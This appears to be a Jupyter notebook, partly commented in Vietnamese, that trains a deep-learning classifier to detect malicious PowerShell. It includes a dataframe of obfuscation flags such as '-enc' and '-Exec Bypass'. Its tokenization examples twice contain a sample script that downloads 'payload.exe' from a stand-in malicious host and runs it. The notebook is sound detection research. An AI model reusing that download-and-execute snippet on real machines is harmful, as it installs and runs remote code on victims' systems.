0  001fd68e5a83c14adf9ae5fd02b4219b05f61f6b5d74f1...   
1  006f5f154f95ceb806c508967fd8eec2e106031369b788...   
2  00764435abfb52cfdd3b19ae03e1eaf4e4ab7a05c4a380...   
3  00a34546b6db32ca0d9f2b6aa25012b873da452a0eb939...   
4  00ac03c8ae8994be7809d8a46387bfb784641e9e4c8ce8...   

                                           Arguments  \
0                          ['-nop', '-noni', '-enc']   
1                         ['-window hidden', '-enc']   
2                                           ['-enc']   
3  ['-nop', '-wind hidden', '-Exec Bypass', '-non...   
4                         ['-window hidden', '

In [ ]:
!pip install tensorflow
from tensorflow.keras.layers import Input

In [ ]:
# Định nghĩa input với kích thước mới
sequence_length = 100  # điều chỉnh dựa vào độ dài chuỗi của bạn
embedding_dim_combined = len(df_with_combined['combined_embedding'][0])  # Tính toán kích thước tổng cộng

input_layer = Input(shape=(sequence_length, embedding_dim_combined), name="multi_modal_combined_embedding")

# Tiếp tục với model như trước, sử dụng input_layer này


### Model contruction


In [ ]:
import tensorflow as tf
from tensorflow.keras.layers import Input, Embedding, Conv1D, MaxPooling1D, Bidirectional, LSTM, Dense, Flatten, Dropout, LayerNormalization
from tensorflow.keras.models import Model
from tensorflow.keras import layers
from tensorflow.keras.layers import MultiHeadAttention

# Parameters
embedding_dim = 128  # Adjust as needed
sequence_length = 100  # Adjust based on input sequence length
num_classes = 5  # For the 5 attack families

# 1. Multi-modal Embedding
input_layer = Input(shape=(sequence_length, embedding_dim), name="multi_modal_embedding")

# 2. CNN Layer (3-layer CNN with ReLU activation and max-pooling)
cnn_layer = Conv1D(filters=64, kernel_size=3, activation='relu', padding='same')(input_layer)
cnn_layer = MaxPooling1D(pool_size=2)(cnn_layer)
cnn_layer = Conv1D(filters=128, kernel_size=3, activation='relu', padding='same')(cnn_layer)
cnn_layer = MaxPooling1D(pool_size=2)(cnn_layer)
cnn_layer = Conv1D(filters=256, kernel_size=3, activation='relu', padding='same')(cnn_layer)
cnn_layer = MaxPooling1D(pool_size=2)(cnn_layer)

# 3. BiLSTM Layer
bilstm_layer = Bidirectional(LSTM(128, return_sequences=True))(cnn_layer)

# 4. Multi-head Self-Attention and Transformer
# Scaling the query (Q), key (K), and value (V) matrices through linear transformations
multi_head_attention = MultiHeadAttention(num_heads=8, key_dim=embedding_dim)(bilstm_layer, bilstm_layer)
attention_output = layers.Add()([multi_head_attention, bilstm_layer])  # Skip connection
attention_output = LayerNormalization()(attention_output)

# Transformer feed-forward part
transformer_ffn = tf.keras.Sequential([
    Dense(512, activation='relu'),
    # Change the output dimension of the last Dense layer to match the attention_output shape
    Dense(bilstm_layer.shape[-1])  # Output dimension should be 256
])
transformer_output = transformer_ffn(attention_output)
transformer_output = layers.Add()([transformer_output, attention_output])  # Skip connection
transformer_output = LayerNormalization()(transformer_output)

# 5. Fully Connected Layer
flatten = Flatten()(transformer_output)
fc_layer = Dense(128, activation='relu')(flatten)
fc_layer = Dropout(0.5)(fc_layer)

# 6. Classifier
output_layer = Dense(num_classes, activation='softmax')(fc_layer)

# Define the model
model = Model(inputs=input_layer, outputs=output_layer)

# Compile the model
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

# Summary
model.summary()

Model: "functional_2"

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Layer (type)              ┃ Output Shape           ┃        Param # ┃ Connected to           ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━┩
│ multi_modal_embedding     │ (None, 100, 128)       │              0 │ -                      │
│ (InputLayer)              │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ conv1d_3 (Conv1D)         │ (None, 100, 64)        │         24,640 │ multi_modal_embedding… │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ max_pooling1d_3           │ (None, 50, 64)         │              0 │ conv1d_3[0][0]         │
│ (MaxPooling1D)            │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ conv1d_4 (Conv1D)         │ (None, 50, 128)        │         24,704 │ max_pooling1d_3[0][0]  │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ max_pooling1d_4           │ (None, 25, 128)        │              0 │ conv1d_4[0][0]         │
│ (MaxPooling1D)            │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ conv1d_5 (Conv1D)         │ (None, 25, 256)        │         98,560 │ max_pooling1d_4[0][0]  │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ max_pooling1d_5           │ (None, 12, 256)        │              0 │ conv1d_5[0][0]         │
│ (MaxPooling1D)            │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ bidirectional_1           │ (None, 12, 256)        │        394,240 │ max_pooling1d_5[0][0]  │
│ (Bidirectional)           │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ multi_head_attention_1    │ (None, 12, 256)        │      1,051,904 │ bidirectional_1[0][0], │
│ (MultiHeadAttention)      │                        │                │ bidirectional_1[0][0]  │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ add_2 (Add)               │ (None, 12, 256)        │              0 │ multi_head_attention_… │
│                           │                        │                │ bidirectional_1[0][0]  │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ layer_normalization_1     │ (None, 12, 256)        │            512 │ add_2[0][0]            │
│ (LayerNormalization)      │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ sequential_1 (Sequential) │ (None, 12, 256)        │        262,912 │ layer_normalization_1… │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ add_3 (Add)               │ (None, 12, 256)        │              0 │ sequential_1[0][0],    │
│                           │                        │                │ layer_normalization_1… │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ layer_normalization_2     │ (None, 12, 256)        │            512 │ add_3[0][0]            │
│ (LayerNormalization)      │                        │                │                        │
├───────────────────────────┼────────────────────────┼────────────────┼────────────────────────┤
│ flatten (Flatten)    

 Total params: 2,251,973 (8.59 MB)

 Trainable params: 2,251,973 (8.59 MB)

 Non-trainable params: 0 (0.00 B)

### Model training

In [ ]:
# Fit the model (adjust batch_size, epochs as needed)
history = model.fit(X_train, y_train, batch_size=32, epochs=10, validation_data=(X_val, y_val))


###test


In [ ]:
!pip install anytree



In [ ]:
from collections import defaultdict
from anytree import Node, RenderTree  # Giả sử dùng thư viện anytree để mô phỏng AST
from gensim.models import Word2Vec

def extract_ast_sequences(script):
    """
    Trích xuất cây cú pháp trừu tượng (AST) từ script PowerShell.
    Ở đây chúng ta giả lập quá trình trích xuất.
    """
    # Giả lập cây AST của script
    root = Node("root")
    func_def = Node("FunctionDefinitionAst", parent=root)
    for_loop = Node("ForEachStatementAst", parent=root)
    download_call = Node("Invoke-WebRequest", parent=func_def)

    return root

def postorder_traversal(node):
    """
    Duyệt cây theo thứ tự hậu tố để lấy các node AST.
    """
    sequence = []
    for child in node.children:
        sequence.extend(postorder_traversal(child))
    sequence.append(node.name)
    return sequence

def build_feature_set(sequences):
    """
    Xây dựng tập hợp đặc trưng từ các chuỗi AST.
    """
    feature_set = set()
    for seq in sequences:
        feature_set.update(seq)
    return list(feature_set)

def calculate_word_vectors(feature_set):
    """
    Chuyển đổi các đặc trưng AST thành vector từ bằng Word2Vec.
    """
    # Tạo dữ liệu đào tạo cho Word2Vec từ feature_set
    model = Word2Vec(sentences=[feature_set], vector_size=128, window=5, min_count=1, workers=4)
    word_vectors = {word: model.wv[word] for word in feature_set}
    return word_vectors

def generate_ast_embedding(sequence, word_vectors):
    """
    Tạo vector đại diện (embedding) cho mỗi script PowerShell dựa trên chuỗi AST.
    """
    embedding = [word_vectors[word] for word in sequence if word in word_vectors]
    return embedding

# Main process
def ast2vec_feature_extraction(scripts):
    V_ast = []
    S = []

    # Bước 1: Trích xuất các chuỗi AST và duyệt hậu tố
    for script in scripts:
        ast_tree = extract_ast_sequences(script)
        sequence = postorder_traversal(ast_tree)
        S.append(sequence)

    # Bước 2: Xây dựng tập hợp đặc trưng từ các chuỗi AST
    F = build_feature_set(S)

    # Bước 3: Tính toán vector từ cho mỗi đặc trưng AST
    W = calculate_word_vectors(F)

    # Bước 4: Tạo embedding cho mỗi script
    for sequence in S:
        V_ast.append(generate_ast_embedding(sequence, W))

    return V_ast

# Ví dụ sử dụng
scripts = df['B64 Decoded']  # Thay bằng danh sách script thực tế
V_ast = ast2vec_feature_extraction(scripts)
print("AST-based feature vectors:", V_ast)


In [ ]:
import re
from gensim.models import Word2Vec

# Sample PowerShell script
powershell_script = """
$wc = New-Object System.Net.WebClient
$wc.DownloadFile('http://malicious-site.com/payload.exe', "$env:APPDATA\\payload.exe")
Start-Process "$env:APPDATA\\payload.exe"
"""

# Step 1: Tokenize the script
def tokenize_script(script):
    # Basic regex to capture words, operators, and key symbols in PowerShell
    tokens = re.findall(r'\$[A-Za-z0-9_]+|[A-Za-z]+|[!=<>]+|[().\\]', script)
    return tokens

tokens = tokenize_script(powershell_script)
print("Tokens:", tokens)

# Step 2: Train a Word2Vec model on the tokens
# Normally, you would have a large dataset of PowerShell scripts; here, we simulate it for demonstration
# Word2Vec expects a list of tokenized sentences
tokenized_scripts = [tokens]  # Use multiple scripts for a real model

# Create Word2Vec model
word2vec_model = Word2Vec(sentences=tokenized_scripts, vector_size=100, window=5, min_count=1, workers=4)

# Example: Get vector for a specific token
print("Vector for 'New-Object':", word2vec_model.wv['New-Object'])


Tokens: ['$wc', '=', 'New', 'Object', 'System', '.', 'Net', '.', 'WebClient', '$wc', '.', 'DownloadFile', '(', 'http', 'malicious', 'site', '.', 'com', 'payload', '.', 'exe', '$env', 'APPDATA', '\\', 'payload', '.', 'exe', ')', 'Start', 'Process', '$env', 'APPDATA', '\\', 'payload', '.', 'exe']


KeyError: "Key 'New-Object' not present"

In [ ]:
import re
from gensim.models import Word2Vec

# Sample PowerShell script
powershell_script = """
$wc = New-Object System.Net.WebClient
$wc.DownloadFile('http://malicious-site.com/payload.exe', "$env:APPDATA\\payload.exe")
Start-Process "$env:APPDATA\\payload.exe"
"""

# Step 1: Tokenize the script
def tokenize_script(script):
    # Modified regex to capture "New-Object" as a single token
    tokens = re.findall(r'\$[A-Za-z0-9_]+|New-Object|[A-Za-z]+|[!=<>]+|[().\\]', script)
    return tokens

tokens = tokenize_script(powershell_script)
print("Tokens:", tokens)

# Step 2: Train a Word2Vec model on the tokens
# Normally, you would have a large dataset of PowerShell scripts; here, we simulate it for demonstration
# Word2Vec expects a list of tokenized sentences
tokenized_scripts = [tokens]  # Use multiple scripts for a real model

# Create Word2Vec model
word2vec_model = Word2Vec(sentences=tokenized_scripts, vector_size=100, window=5, min_count=1, workers=4)

# Example: Get vector for a specific token
print("Vector for 'New-Object':", word2vec_model.wv['New-Object']) # Now, 'New-Object' should be present in the vocabulary

Tokens: ['$wc', '=', 'New-Object', 'System', '.', 'Net', '.', 'WebClient', '$wc', '.', 'DownloadFile', '(', 'http', 'malicious', 'site', '.', 'com', 'payload', '.', 'exe', '$env', 'APPDATA', '\\', 'payload', '.', 'exe', ')', 'Start', 'Process', '$env', 'APPDATA', '\\', 'payload', '.', 'exe']
Vector for 'New-Object': [-0.00516472 -0.00667154 -0.00777204  0.00830342 -0.00197134 -0.00684835
 -0.00416143  0.00515856 -0.00286316 -0.00375641  0.00161083 -0.00278854
 -0.00159257  0.00107291 -0.00297773  0.00851081  0.00391922 -0.00994826
  0.00626263 -0.00676427  0.00076209  0.00440425 -0.00510363 -0.00210578
  0.00810651 -0.00423663 -0.00764738  0.00927363 -0.00216386 -0.00470475
  0.00857171  0.00428111  0.00432505  0.00928336 -0.00846478  0.00524458
  0.00203079  0.00418732  0.00170511  0.00446801  0.00448436  0.0061128
 -0.00320977 -0.00457246 -0.00043753  0.00252339 -0.00325231  0.00604948
  0.00414751  0.0077736   0.00258268  0.00810515 -0.00139223  0.00806935
  0.00371338 -0.00805411 -